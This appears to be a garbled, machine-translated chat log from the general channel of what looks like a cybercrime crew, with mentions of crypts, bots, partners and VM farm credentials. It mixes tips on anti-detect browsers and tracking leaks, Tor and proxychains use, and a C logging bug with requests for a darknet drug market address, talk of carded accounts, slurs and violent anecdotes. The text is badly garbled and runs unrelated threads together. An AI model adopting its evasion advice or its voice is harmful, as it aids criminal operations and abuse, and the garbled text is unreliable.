resist it, and yes understand.to. no one had any idea that they were being trackedwhich is the reason they were forced to warn all the users you do not mind?you get a big window - we're collecting cookies here now remember - when you're surfing the net, on every new site i'll introduce you, on my work computer, i only have work, i never use personal addresses) it's probably you who's changing your address) and you've been penciling on it google knows that you now have another address) the session cookie went to google - you're not in private mode, right?went back to google again changed the sessional cookie and it every time you open any google service (including any google-analytics site and 99% of such sites) knows that you're it google knows that you're it you went to your google mail you've got the usual ff mode lookfingerprint it blocks, but the cookie does not )@angelo put the sphere you'll understand everything i have the ff settings on Kastom where it blocks all cookies fingerprint, etc.etc.kanvas cache favicon - everything stays private mode disables leakage through cookies, but not through everything else prints, so the answer - in the first place the leakage is through cookies the second is webrtc canvas cache, etag safebrowsing faviconim precisely for this windowa if you work in private mode, then all the cookies set by the sites as if forgottenyou go to any, and google is sent cross-browser cookies - I all pootrubal through the config it does not help google sprays its cookies like a fucking fauncuke there is a global in vindex localstoredge your cookies are sent that all? i disabled all through the config who else does so? well cookies are sent in normal)) but on another vpn all was clean) well you give me )normal you work in private mode or normal? for the browser work you need some antique multilogin, sphere, etc. 
for fuck's sake, I just turned on another wpn, the browser did not change anything private window, do you know how to turn on the fucking cookies? there is also a leak through the cache all clear and google sends me in search ip-usa what?it does not help ip-address leak? just changed the wpn and shit leak happened not that alone ffda i shut everything down in the ffbrowser what? webrtc after changing the wpn from the browser? dnc What's the leak on Googol? @all Friends who still use the old VM farm to work, the connection has changed, the credits, write to me in ls. "Cool history "Well, this is understandable, but it is too expensive to argueKo me recently drove up in a car, they showed my ID and offered to go, when asked where, said to be witness to the next house, they say something happened I said I was in a hurry, I thought it would not work, but they were not digging deeper and I went home). But at first I was tense) There are no regulatory federal documents about masks. There are only resolutions of mayors and governors, without stamps together with signatures. They apply only to workers and employees of the authorities, and are advisory in nature. In short, they are taking the piss out of people.(c) ))))))))) told me not to argue anymore (in general, I somehow got away with it they were like - no, that the pointer, the arrow, and the smoking place 500m away is oooooooo over there, your documents fit, I said what's the deal, I'm in a smoking area - I don't give a shit, they see a sign saying 'smoking area', for some reason it's right next to the entrance to the station - and they're like, two years ago I opened a coke shop near my doorway - and they did a gayorrhoi there... 
they radioed for a garbage truck and i sat there for three hours, then i walked home: and several times I've seen situations - lying in the ass, a blue homeless guy - just passing by They already had a law against smoking in public places I was once in Bryansk, about a year ago, and there I thought I needed a cigarette and I'll show off too)) you guys are scary people) well, you'd better go and tell them to fuck off rather than go to the station all day, I once got caught also on administrative charges. but a friend wanted to flaunt knowledge of the law, we were released at 12:30 a.m. and he was detained at dinner time and he was sitting there with a mask on his mouth, I took his picture and wrote in the report that he also put it on, he said it was ok with his mouth shut, then I asked him for some documents that say there are rules for wearing a mask, they were not found, so who else got caught in the system this week?I had cops look at my phone the other day) On my statement that it is illegal, they said, that, they say, do you want to lose half a day in the department?) Just do not flinch, or they will take a 19.3) you do not play with you wife saw how one young man straight in a five-storey grabbed)The cop himself was without PPE. Info 100ka) Yeah, you come with a huge / wide pipe pridu a completely different person) well, they just teyabtsirovat) On YouTube, there are videos where these comrades go to hell and go further, such as a fine will not know, will the court@thomas there had to send this friend and say that he went to buy a mask@thomas You paid the fine?I went to kindergarten - they don't let me in without a mask, and take my temperature) just yesterday they were joking about vaccination, and that it was all bullshit) today a fellow policeman fined me for going without a mask in a public place) and made all sorts of protocols for another half day) Hi, everybody. 
How many of you have dealt with neural networks in terms of creating, training, calculating the grid, the amount of data to be trained, data training, etc.?i'm a survivor here how is it not like you, guys are quiet here, i'll take a look, thank you. it's really the difference between the sky and the earth2K cost it has a lot more reflection coefficient, but the viewing angle is lousy, the screen is reflective, i can not do it imho i have a 100" tv projector only without the sun, I think how to increase the brightness or blinds to take@patrick you know, I once wanted to build a CNC machine tool on the arduino, and realized that I would rather Kermit cum than sit and do it, although the desire remains@angelo `https://habr.com/ru/company/ruvds/blog/645897/` i can give you some money to buy some methanol, i need some methanol, i need some pills, i need some dough, i need some pills, i need some methanol, i need some pills, i need some pills, i need some pills, i need some pills, i need some methanol, i need some dough, i need some pills...he's got money for methane he needs money for sport and kurst...I think you're whistling about booze I'll give up the bottles and I can live a month@angelo malt - spin, earn money Fanz would not have chosen such a carpet he had a red carpet and someone knows he's a 60k pusher, it's too early to get it, we all know him by sight but he was not in those gb videos?better tell me where Franz and the coins are after Stalin's death, it would have been a mess. if something had happened, Franz would have said funny))) Angelo is a secretary now) good. dad is not going anywhere. everything is normal with him Franz wrote that he is still on vacation for his business, but he was not missing him. I don't know when he'll show up... You're Khrushchev... Asians, and whales in particular, have chauvinism on a cosmic scale... Lavrov did not get it, but you did?) once spoke in English with a Chinese, they understood each other... 
There are different legends about it... The thing is that they usually have no respect for English, or pretend not to... They do not know English. They teach them badly there, as one Chinese man said, "You're not my brother, you're not a brother, you bastard"? Everyone understood him perfectly and really fucked him up. One of the Russians already talked on the bus in Moscow the other day; I do not understand "too Russians", except for foul language))))) You'd think we always understand each other)) Huh, I have two students there, their words are not my native language, they speak everything normally in Mandarin.. elroy, well, yes, in their language) ... The thing is that as a rule, they do not respect and do not know English ... or pretend that they do not know it; they often do not understand their own from other provinces. But in writing, I'll probably forgive them... In their language, you mean?) And suddenly, brothers, are there those who can correspond with the Chinese without "google-translate"? Last year... I'm about to bring sacks of gold, but what about our salary? And have a productive week! ;) Merry Monday to all you guys! @weldon look how the crime report deanon would not be arranged) https://www.youtube.com/watch?v=nhVs22Fkakw Berkova actually recently debuted in pop manu. Don't get too carried away with salts, preferably c2h5oh + pickles))) old-school)) I told you - the neighbor above me lived (not for a long time), bought a house and shagool from the balcony to this theme... I got fucked up with questions and I don't even know what his name was... I haven't watched the others with her) [ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=3MpxMfirugwqosAqB) with men in movies?) Berkova has many fights, but the opponents are fucking flawed. What kind of fight is that? It's the fault of the wine. I have a MAC laptop that came up.
So on the MAC all is normal, and the wine is 99% stable. Do not remember, somehow it is even called) the last couple of years, almost all laptops are not charged when fully charged, but now it does not matter if the network cable is connected to the notebook or not, when the battery is already charged to 100? Are the controllers like that? Maybe you leaked to the Americans? ``` So one of his colleagues leaked Nikulin to the Americans. Yes, the court confirmed that he was charged with treason. Sachkov himself was arrested for two months. Maybe he leaked to the Americans? He wanted to take care of problems so he could go to America. It's not clear why, for ties with the Amerksen. Siloviki search Group-IB. The company's management may be detained `https://rtvi.com/news/gendirektor-group-ib-zaderzhan-po-podozreniyu-v-gosizmene/``What a twist* and maybe you there already make the chat magical #golovastbIE Have talked about work for a long time in the work chat.)) I know you programmers!
They start with their zeros and ones with gits and then end up with pornNowadays they are good, they think about work))) You scare people more times but they delete their posts)))) To remind me there are no workers here, it's a typical programmer's chat about life...I dare say, Uncle @elroy already mentioned that we don't discuss working stuff in *general* window and git in onion, really, I do all such moves through proxychains, and there is a chainWaitForSingleObject with timeout to unavailable resource, etc.Sorry, citizens, but how sekuronno fluff from your ip, or even through the vpn? senks gais! In gitlab can be the main branch of the main, and locally - the master. Need to correct.git remote add origin yes, created through git iinitproject already created in git? Gentlemen, tell me, I want to transfer a local project (folders and files) in gitlab, how easy to do it, not in the same file / document to fill ...?! Under ms I compile everything to be /W4 /WX but I only disable #pragma warning(disable:4214) #pragma warning(disable:4201) #pragma warning(disable:4207) otherwise there is no wayVS as far as I know and creates projects with W3 by default this is ideal)even on type conversion there is noW3 and not a single warning usually is brought to this or how treat warning as error directive lookszb if code is built without warnings with -W3 by the way, it is wrong)_CRT_SECURE_NO_WARNINGS I put in every project all the sameAnd I don't really give a shit, and which took in C11this way in msvc there are some additions, the same functions that have the postfix "_s "htu closer to it so msvc is not an indicator, when it comes to standard crtKey point - likely. Again, there is nothing like that in MSVC. Internally, the function retrieves arguments from the list identified by arg as if va_arg was used on it, and thus the state of arg is likely altered by the call. 
Guys, it is described in the documentation as "c/c++" paths are inscrutable :)While I've been using similar logging code on the Windows for more than 10 years. The funny thing is that I've been writing this code for a couple of months and it didn't even occur to me. In the debug there was logging on the screen. In the release it was logging to a file. And in general everything was working fine. But here I ran the release with additional logging on the screen and it started crashing randomly. yes, va_start writes for va_list a pointer in the stack to the parameter that comes right after format but vfprintf, when it fetches data from the stack, it also changes values in va_list to the next one after each fetch, so log_write(char* format, ...) { va_list args; va_start(args, format); vfprintf(stdout, format, args); va_end(args); va_start(args, format); vfprintf(_log_file, format, args); va_end(args); } Looks like va_...... has some internal static pointer which is initiated in va_start so if it %s - it will crash (although depends on stack) and at %u - just left numbers.i.e. after first use va_list points a bit further than last parameter. Then there is already garbage there. If we take trash as a number, there's no problem. But if it's a pointer to a string, then it'll be addressed to the wrong address or the zero-terminal string affects it somehow), but trash is written to file. log_write("a=%u b=%u c=%s\n", a, b, c) doesn't cause a crash any moreIt's pretty trivial. The problem is with va_list, or rather in functions that use it. In this case, if you use vprintf and vsprintf, there will be no difference too. The whole point is that MSVC's v*printf function does not change va_list. Also other (but not all) compilers don't change either. But gcc does not save values when used. So after the first vfprintf the data in va_list no longer has the correct pointer. And re-use will cause crash. 
You can even make _log_file = stderr; If `_log_file = fopen("/tmp/test.log", "a+");` to disable it, will it make the same difference? I understand, but if a, b or d somehow become negative, your output will be gibberdano; in this example %i %d %u is like nothing at all. Well, when it comes to 32/64 bits it is clear that there may be problems. When you shove 64 bits, and counted 32. Then puzzled over why, then had to change to unsigned long, and when logging forgot to make corrections. And it's clear, it just happened that the original data type was int. unsigned long: %lu. Just I remember paparak))) the difference was when using long or unsigned long, do not remember) well, it's not like it matters. You can also replace it with %i, there will be no difference in this case. %u for unsigned integers, with sign %d, because @gelmut, why does your int output with %u? I.e. it is a trivial logging to screen + duplication in file. For the whole day to look for an error in the code. Everything turned out to be trivial and strange at the same time. Part of the logging code was ported from Windows (ms compiler) to Linux (gcc). Everything works fine on Windows, but not on Linux. This is the first time I've encountered something like this in 15 years. This is a mental exercise. What will this program print on the screen? And why does it do that?

```c
#include <stdio.h>
#include <stdarg.h>

FILE* _log_file = NULL;

/* Logs to the screen and duplicates the line into _log_file.
   NOTE: args is passed to vfprintf twice without being re-initialised;
   reusing a va_list that a v*printf call has already consumed is undefined
   behaviour, and that reuse is the bug under discussion, so it is kept as posted. */
void log_write(char* format, ...)
{
    va_list args;
    va_start(args, format);
    vfprintf(stdout, format, args);
    vfprintf(_log_file, format, args);
    va_end(args);
}

int main()
{
    int a = 1;
    int b = 2;
    char* c = "3";
    int d = 4;
    _log_file = fopen("/tmp/test.log", "a+");
    log_write("a=%u b=%u c=%s d=%u\n", a, b, c, d);
    return 0;
}
```

Guys who use Pidgin - do all have problems with the buffer when copying from chat pigeon? Either in sources.list or in a separate file in sources.list.d. @nicholas, first in etc/apt/ add the torproject repository, then apt update and apt install tor. Try https://askubuntu.com/questions/382394/how-do-i-install-the-tor-browser-bundle-in-ubuntu tor is already the newest version (0.4.2.7-1). 0 upgraded, 0 newly installed, 0 to remove and 5 not upgraded. Hi. Is `apt install tor` okay? Hi! Does anyone have a reliable procedure for installing the tor band under Ubuntu 20.04 (google and sudo apt install tor not to be suggested) will stay, but it's all cleaned up in half a year, so don't worry, you're not in danger? It's
funny at first, but then you can't see your dick and you're already sad haha[f] here, handsome, don't fatten up your stomach or you'll get mirror disease later on...don't you have any beer? the beer in general all beers have no taste whatsoever...).ttuborg is not good at all...) with tuborg not bad, yes, you left - I'll be back soon, don't miss me and then your ass is on fire and swearing.This tastykfs + beer is tasty but bad everything else is lame potatoes in a poppy.I would have given a lot of people if it were my willdolboys parents kick your parents in the cunt, And kids are fed all the way, kids at poppies have been eating potatoes since they were 2 years old. They don't eat fried food, they just don't know how to fucking cook, do they?They often feed kids that kind of shit, kids with salads from the store, they rarely go fresh, or rather never a priori, and the salads in the store are always dnosalatikami and people who feed their kids eat it and don't give a fuck about the fucking economy, I just don't understand why the fuck they should. in x5, it's weird to buy ready-made shit. everyone saves money, but i don't think they cook it very well. is this x5's azbuka vkusa? i mean, only my mom's place smelled so bad. they've had a rot rotten meat salad once, and they outsource this shit to some vendor in x5. did you think so?like everyone else? no, they have just dirty Uzbeks cooking with their kitchen, did poutine's cook? what did they get poisoned with?They had a poisoning last year. Cut up vegetables + grate cheese + slices of cooked chicken, even sausage, and everything into a flatbread pan. I think you can buy ready-made grits at the A to Z and heat them up.he's a total cunt, he poisons his kids, some people get poisoned by hrbchev, you're just like Putin's chef. Feeding people is not worth it - they sometimes poop. 
I even have recipes in algorithms and the recipe follows the fucking proportions, unless you call the restaurant DIMENSE they are always a bit different, I can't repeat dishes, you're just developing scoliosis. You don't need these computers, open your own restaurant))) and spices in one bag with the words "I don't give a fuck what kind of Caucasian spices" I'll get drunk while cooking, pheasant, there's no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant, no pheasant. It's not Kazakhs, you can't do it canonically... You should have said beef... I'm fine with chicken...You fuckin' crazy? You don't fuckin' canonical chicken, you fuckin' need chicken from sausages? What are you gonna make pilaf from? It's greasy and fatty, it's delicious, you fuckin' smelly, I bought some lamb to make it. Only if you order meat from a vendor you know on the market... You from the producers, I don't trust random vendors.I don't trust random vendors. I'll make it myself when I have to go to a local store. And I rarely eat sausage with sausage.at the mass market, the food is on the feed... fuck... maybe i'll go to a fiver for sausages... i don't know what i'll cook/buy... but please, sir, go eat already... now i want to kill him and someone else... did they ever tell you that when you were a kid?When I eat, I'm deaf and deaf and I don't have an appetite. I eat, don't I? Now @angelo is gone, especially when I'm working I just chew a lot. Kermit, get a woman to cook for you. 
women usually eat more than me at macdacs, he goes to see a man or a woman, I don't know how you do it Kermit, get a woman to cook for you and don't eat rotten dumplings like your two comrades.I don't want our star of skepticism and pessimism to die of starvation. I bought some sausage, you've got dumplings on the walls. I had an expired ointment for 6 years. I still remember the fucking smell of them. I got poisoned once, don't buy dumplings as a last resort and eat them. It's not the first time I've had dumplings and I'm too lazy to cook and I'm too fucking hungry. All the ducks have died in my pond. I can't believe I worked here. I'm sad without you, you are a huge part of my heart!@kermit hope you're at least alive and not decomposing under the table in the kitchen, I can't stand itThe mountain of fallen bits got drunk on the remains of these bits? Where did everybody go? Cyberpunk of our time) nah, it's poppy Hammer, sometimes I think you're a safety net for writers)) Good writers )Have a nice day!!!Error... Establishing communication with service technicians to unlock the camera lock... No communication... Reducing simulation area.... Reducing allocated memory.... Reducing the GW$hage74G// to the lower threshold of the life support level.... Remaining charge is enough for !#( yw4 .... .... DANGER!!! Low battery on life support camera.... Automatic lock release....Communication established.... %^SUCCESS, a reminder. According to the simulation test program you must adhere to the ecnfyjdktyyjq program of action#;y, otherwise #Pevvvnc56 WRtvn....... .... .......#%. Eggca.... ;%bka.... Osh(ka.... No connection.... Date of last session: 12/06/204^ Time elapsed since last session: 1{568# DAYS Switching on the communication module with the neuro-interface test camera............Getting power from the solar panels.... Area of working panels from the norm: 0,04% AI exit from sleep mode.... Partial s/-+++++++++++ Exit from energy-sleep mode suspended... 
Communication with the central control to receive new instructions....@angelo shaKazakhs will catch upStabilityNow so always zp got and bit fellkhekHow do you fantasize with chip you will do so forgive you here do shit lying down, no punishment, but they cover the skulls do not beat? or Kermit call?preferably be laid therewhat are the requirements? do not like people and monkeys, like experiments? they whisper that there will be trials on humans, after already successful on monkeysElon Musk's Neuralink company, which is developing an invasive neurointerface, has published a vacancy for the director of clinical trials. It's reported by Bloomberg.you can try an offshore tryyura! @all happy new year to you all TIGERS!!!! I'm sober as a glass with a new year, bro!!! Happy New Year! :) All of you! :)hurraaaaaaaa!!!!!! Happy New Year guys !!!!!!!!!!!!!!!!! sober )Happy New Year, friends!somehow it did not sound like that ))))))) call me, 100 bucks/hour what the fuck if on new year do not offend, so i give you a brotherly hug and congratulations )fuck, i would be scared if on my new year you were Santa Claus and he still have to wait for his time, i would be scared if you were my new year's Santa Claus, he'd still be waiting for his time, i'm always sober and i thought you'd be the first one to get shitfaced)not everyone's already shitfaced except me and Kermit ?)wow, twin)HAPPY UPCOMING NEW YEAR TO ALL! I congratulate all with a holiday! I wish you all good health, a lot of money (in your favorite currency :sweat_smile: ) and enjoy life more often! Best wishes to your families, lots of positive and happy moments in the new year! Hugged - cried :laughing:the whole year watching and decided to give my opinion, cool captcha on: bridges_torproject_org where case does not matter ...)brothers, happy holiday to all!!! 
And those whose time zone +9, then a happy new year))) Happy New Year to everyoneChpongpingVo, Kermit brother in sobrietyrebutni and for penalties bild car@demetrius@de@demeble hung server100-200-300-400-500-?:sunglasses:100-200 grams of whiskey? The passing year was very interesting. It was a lot of things)) I wish you a Happy New Year: - Patience to our admins. - vitality to our bots. - Fortitude to our cryptos. - Diligence to our reverses. - Resourcefulness to our programmers. - Attention to our testers. - Profit to our partners. - Kindness to our managers. - Great patience to our management. And good luck, gentlemen, to all of us, and even to those whom I do not know yet))) Only there was the beginning approximately so: This year was x???? that's not a secret. I do not remember further =) something like Zomba style =) New Year wishes, or congratulations =):beers:Strongly said))) Happy Easter, my old comrades in arms! This year was interesting, exhilarating and sometimes very lively! May the guys @elroy keep us in the battle crypto greats, may the code of the guys @silver be as pure as the thoughts of a child! And testers @manuel search and find the secret! And to the @adam admins, I wish whatever it is that's going down doesn't drop! Our team is as strong as Jennifer Lopez's ass, and the power to fuck our enemies is comparable to Woodman's erection! We are strong, indestructible and fucking awesome! Crypt to your wallets and love to your homes, my darlings! Let the fanfares of our victories ring out for all eternity! p.s. And also, that @frances and the Commander-in-Chief love us, as we love them and the bits :D Happy New Year to all !!! You are the best!!!! 
sorry guys, no dicks today (─ ─ ─ ─ ▄ ▀ ▄ ─ ─ ▄ ▄ ─ ─ ─ ▐ " ░ " " " " " " " " " " ─ ─ ─ ─ " " ▒ " " " " " " " " ─ ─ ── ─ ─ ▀ " " " " " " " " ▀ ─ ─ ─ ─ ─ ─ ─ ─ ▀ ▀+____+____++____+_______+________ half a hole))++++++++++ people play on emulators with old roms anyway, and so would still buyNintendo could have long ago released pokemon on pknu or a glass of kefir, if he is for HAW, here I do not know a glass of cognac?)It's not a leg third, that's what Weldon likes when in front of his face )It's like a wake, come to life ... You have a way out, you need an old freezer. You open it, look sadly, wipe away a frugal tear of longing for the snow, smile and go back to the sea.Happy New Year! I miss the snow, I can not see him for years, the beach and everything Nintendo sueTypical bunnyThis is a fake) That's just not PikachuTail on the rightTwo front and left? On the right is two back He has a new skin) What is he? The third leg? Who bought new pokemons? Pikachu! :)░"▀▀▄░░░░░░░░░░░▄▀▀ ░"░░░▀▄░▄▄▄▄▄░▄▀░░░ ░░▀▄░░░▀░░░░░▀░░░▄▀ ░░░░▌░▄▄░░░▄▄░▐▀▀ ░░░▐░░"▄░░░▄"░░▌▄▄▀▀▀▀ ░░░▌▄▄▀▀░▄░▀▀▄▄▐░░░░░░ ▄▀▀▐▀▀░▄▄▄▄▄░▀▀▌▄▄▄░░░ "░░░▀▄░"░░░"░▄▀░░░░"▀▀▀ ░▀▄░░▀░░▀▀▀░░▀░░░▄"▀ ░░░"░░░░░░░░░░░▄▀▄░▀▄▄ ░░░░▄▀░░░░░░░░░ ░░░"░░░░░░░░░░░""""▀ ░░░▀▄▄▀▀▄▄▀▀▄▄▄▀))))))))))mlya, I can't calm down, "with Alla Borisovna I would hang..."))))) we need collective work! We all need to make a wish - and the bit will fly to the sky! I do not know where it ended, but my snow will always be white!They just ran out of snow in 2004, so they started doing fintikosNo quality from Germans, not even a frown, they've lived long enough! Guf Novogodnyaya for all times is the only song from all russian rap with the name "Novogodnyaya" like that :D But fuck, no decent gerdos, so they say....YOne snow gives us the sky, The other is brought by Ded Moroz, Tajiks and Negroes With presents, in the depths of their stomachs Or by big trucks with the last harvest of fruits.:D Cheers! 
Spools are already booing like that ...By the way, soon they should bring the snow)) the snow is not melting, here it flies not yellow snow! but the snow maiden, yes, we choose snow! )In general, I often wear red clothes and turn into Santa Claus )From you candy))) Thank you for the tricky question "Who will be the snow maiden? )More interesting, who will be the snow maiden)))@angelo how about you?)))Happy New Year to all! Guys, who will be Santa Claus today ?For the lazy) `https://bridges.torproject.org/options` `bridges.torproject.org/bridges?transport=obfs4` you can request the same here, and then manually typed *request at the tor with captcha - obfs4 bridgesbozhechki, without me you fade away !If I'm not mistaken, I will try to use a bridge with a VPN and such bridges, everything works fine @weldon but bridges are built into the browser or a bridge request from a torus? there is such an option!@Garfield i have, in general, without vpn, no bridge does not want all hello, all happy HAPPY (a bear in the usa))) one of the torus that i have in the containers does not connect directly without vpn, although i got bridges to it (not connected and all that and bridges does not allow to change / new request..nonsense), the other tor connects (also with bridges) without a VPN from the same provider, I don't know why, versions are the same and both worked recently... 
soon, and just torrent trackers for new movies without a VPN cannot be scrolled through torus on an ordinary home pk :pensive: If anyone has ahas a second channel "general" (with an unread message), Make it "Hide".my first time did not work, I got stuck on the assembly of the qtox and describe the process )@all who will assemble qtox on the wind will get a bonus )yes, I would take it to them - let them live)) and europe freezes)) apparently we do not, they do but the issue of energy costs is very serious in this area...or am I thinking of something wrong? KZ has restricted energy supplies for this kind of activity until February 1. There, even Kazakh miners dream of getting their NPP)) the surplus energy would go into the ground, and some of this money goes to buy mining, an inflow of foreign currency, but first weigh the pros and cons in the possible direction of the surplus electricity, of course, today the surplus of electricity.The right of claim is contained in a bill of exchange - it is handed over to the bank and exchanged into credit tickets. Loan notes - contains credit (the right to demand) in accountingNow and debit/credit still works, noteCredit is the right to demandIn the 15th century it was discovered that with credit you can create money and gold itself does not need debit.Debit is debt, credit is the antipode of debtMoney is credit in accounting. Credit is the antipode of debt. What is the antithesis of debt? We have been told by our brother that there is strength in truth, we will go to heaven, they will go to hell, and what else is needed? )) They'd better relax and have funHow are we going to fight if there is no sovereign system?Everything is as old as the world, taking surplus money from the population and the budget, the budget buys paper and sells valuables. 
Everything worked in the USSR, there were treasury notes of 1,3,5r and state bank notes of 10,25,50,100rTreasury system looks similar. The authorities pay treasury notes to state employees, and then they tax them to business. The business gives the budget holders nickels in exchange for them, or they are pulled off the gold.One way OstapagestkoThe scheme is easy to lay on tokensClassic bank scheme looks like this - a person sells another against a promissory note in gold. The promissory note goes to the bank - the bank exchanges the promissory note for credit notes. The debtor must redeem the credit notes from the market on time and collect the bill in the bank, otherwise the collection in gold.Yes))))) I think it is exaggerated, 6 million Moskiches, that is more accurate to be> in cryptocurrency keep their savings 6 million Russians That's cool to hear him say that. I had this thought for more than a yearIn fact, you have written this in the middle of the night, I even woke up)))) In general, legally hacks - the topic. The progres, by the way, are masters of formal logic, and jurisprudence - that's itThe judges are vibratinga all right, it's logically so, we must change itAccused the general of the FSB of treason, and sort of ask him not to trust. One man defended himself from terrorism this way. Since he bought the de facto requirements for NATO, it means he was rendering him services - high treason. People used to troll officials, accusing them of treason. Its main objective is to buy treasury bonds of NATO countries to secure the ruble. So they are quietly taking away what the British guys created in the 90s. 
Give me the ability to print money and I don't give a shit who passes lawsRight, the state monopoly on banknotes is the basis of powerThe man who made currency in the Moscow region - the colons, the FSO knocked his teeth out This is the extreme, talk about the Central Bank not replacing power If there is no monopoly of the Central Bank then anyone can make an issue bank of banknotes, secured by promissory notes, and gradually take it overWhat about the Central Bank monopoly?The fight between the liberal part of the government and the president continues, the truth wins)) Vladimir Putin spoke for the first time on the initiative of the Central Bank to ban cryptocurrency in Russia. In short: there is no need to ban it. If long: - 6 million Russians keep their savings in cryptocurrency. The total amount is several trillion rubles. This money should stay with its owners; - blockchain and crypto are a magnet for thousands of innovative projects involving the young and active. Predictably, they live and work in the countries with the most attractive cryptocurrency climate. We need to become such a country. - Russia is third in the world in digital currency mining. There is no reason to lose this position, the digital financial structure is a good thing; In general: there is no need to ban it. It is necessary to create a clear legal system for everything near crypto. Transparent rules, understandable mechanisms, security and adequate taxation. https://t.me/breakingmash/30815 Get well! Don't give an infestation a chance)) the best reward for a guy who has a whole brigade behind him! thanks guys@angelo get well bro@angelo get well yeah, pump up your av base from all sorts of omics get well, getting sick is a shitty thing to do if somebody lost me, don't hope so, i'm sick, i will get well soon with your prayers, love kisses, your angelos("cls")?) [from Garfield] -> hello everyone. 
Hey people, who uses proxmox for tests, does it work fine for you?
hi!here?hi
tenderness !How to direct such powerful energy in peaceful ways? It occurred to me ... 
On the old days I'll say nothing.And flooding today and there's almost no in comparison with the old days like alive, once only fell off, but it's a long time tired of flooding, for us it discharges badPah, and by the way, you still not tired of flooding? Guys! And what's wrong with the toad? threw the toad skin, turned maiden, hit the ground and pomorlaba something not very nu fuck, it breaks here)) by the will of the pike at my will - turn the toad into a fucking working granny in the first half of the day there were several sort of outlets, now seems to be working steadilyrazgorte of the day, and screwed everything (not onehodou me alone?fly out constantlyada is already smoking from the process-job-come on) wetrookov))) Sukhorukov will not lie work you rip her toad can not go And a positive mood)) good) your meeting - the catalyst for uncontrollable fludanu urgent need to call @redOgni! Demetrius, thanks for the cleanliness in #generaltomething this year, people are flying more than ever, especially kids - 200-hello, live? @angelo get a brain, not a junkie here, by the way, in my real life, above me lived a guy, last week jumped off the balcony ... i can't believe it, i'm not a drug addict here. by the way, my real-life boyfriend used to live over my balcony last week i jumped off the balcony. the coroners fucked my brains out, they wanted to see if i was spreading and why i had the music playing at night. good for you, let's roll memonics. i deleted messages once a day, but i had boobs. did the channel history get nullified? Hi! 
```
disk -l theimage.img
Disk theimage.img: 111.79 GiB, 120034123776 bytes, 234441648 sectors
Units: sectors 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (min/max): 512 bytes / 512 bytes
Drive label type: dos
Disk ID: 0xb6b6f687
Device         Boot     Start       End   Sectors  Size Identifier Type
theimage.img1  *         2048  78125055  78123008 37.3G 83 Linux
theimage.img2        78125056 195311615 117186560 55.9G 83 Linux
theimage.img3       195311616 205076479   9764864  4.7G 82 Linux swap / Solaris
theimage.img4       205076480 234440703  29364224   14G 83 Linux
```
tablichu us sktny now decide:) Was 2048 78125055 78123008 37.3G became 2048 78125055 78123008 298Gnu and through dd and copied :) dd Or partitions need to recreate? how to clone disks with different sector size? 512 and 4096? for an hour otpcsp + testtipo plati_ru, kartzhennye akki? I downloaded from oofficialka, created a new account, cell phone does not need, from the left email to avoid bookmarks from the Chinese download from the left site, why do you need the MS?) no so download from rutreker broken, or from eBay, they also sell:rofl:no, I do not know the name, I know that there are, particularly popular are the aces to ea games are all sorts, but the software should beObraz a torrent key from ebayavito? I remember the guys once showed me a few years ago, the shop, it was possible keys to the Windows, studio aces, what you want and somehow cheap, about five bucks, or so.there is a whole site where all this crap is sold for next to nothing, you can always buy a bunch of keys and ask for an account ... I do not remember exactly, but I think just a microsoft account needs more and ask for a phone, probably incandescent these constant regikiosks with CDs "all for Web-design" already do not have)) there's a community of free distribution always, but what email entered so register, what's the problem? 
https://visualstudio.microsoft.com/vs/older-downloads/ how do you download old versions of studio from ms (2012, for example)? my bundle-tor just stopped working on windows today. did it just fail that my rocket page won't load? does it show 500 with bridges? everything works for me. hihi all, does it work without vpn tor? oops!hi! did you see? polodite)bum detector updatbeiss fresh air, physical activity, pay well):rofl:to work as a bookmarker went? 
maybe someone remember the address verif, also in ls who remembers the address of Hydra - throw in the lie of course Kotik!)))))) i am your friend also hydra friend asks you to give the address of our store something i do not remember exactly on gta and i do not remember the exact picture levitan "elephants stomped away" picture fucka here came to you to piss in gta 3 tok were tanks)) and you do it from a helicopter or on a tank crush it not?In gta3 it was in the mission vidzhilantes bazooka get out of the limousine even give them:Dak I met such meta now bums will be given money in Ruglavnoe with a bazooka not to run into anyone there on the bums - the main thing is not to run into a bum with a shotgun fence through and on the fly in 12-14 too did fun, The Russian Criminal Code doesn't work with kids. There was armature instead of a bolt. I'll say nothing about crossbows from a spring. I was bored. The buggers would go to the Red Brigades by 12, that the whole village was fucked up, then they put nuts and the like after the wadding, thick wadding, a couple of packs of gunpowder, they heated it on one end, they took the pipe away from hunger when he was a cunt. Can I tell you what my grandfather did in the fifties?i won't tell you what we were doing :D and not the ssannina we're doing now) when it was still OK and when we had hot-smoked bream in our youth... that's not what we were like in our youth... at least we didn't rape a man, that's a fact. teenagers are bad - it's funny and not funny at the same time.You just had to see and hear it in words. We hit him in the jaw with a whirligig, he farted a lot while he was falling down. Of course he was blue. One of us was a karate guy, some Tamon came up to us. Seeing him wake up and the horse slept there. We went pissing in the bushes. I remember a homeless guy fucked with us. He was really good at it. He throws a stone at a bird and after a couple of seconds it's already in his bag. 
)) In respect of the Bart can apply blackmail)) everything grows from season to season, but does not grow nikuyya ba his son bart threw, but he had enough, sorry him, but the theory and the norm itself is running away at the time "bum, I choose you "If any problemsolovite bums in pokeball and will zbsDlia ordinary people do not. The uk has not been abolished, just like shish kebab in the soviet Union. Haven't they abolished the uk yet? Sure)) We'll soak them in vinegar. Meat is bad))) The homeless are not eternal if so will continue, we will have to catch someone else, I'm already beginning to catch the homeless on the districtetam Franz a couple of days ago wrote about zp and geet. I do not understand what he means guys and zp is delayed again this month? björn straustrup approve me this xor^C^ evil^^=pong:ping_pong:-+pongpingwhere the dosimeter goes off the scale, you can't go wrong if only the person was vaccinated or by 5g, where the signal is stronger, there is a cluster by chips to find the remains?I'll fly to me and go straight to the oven, I thought I'd take them out of the freeze, bros@angelo, do you have any pigeons left there?morf2/3/4, phobos, deimos people are using -- have already picked them upThat's how we live...you can forget why you cameTo go to the bar. 
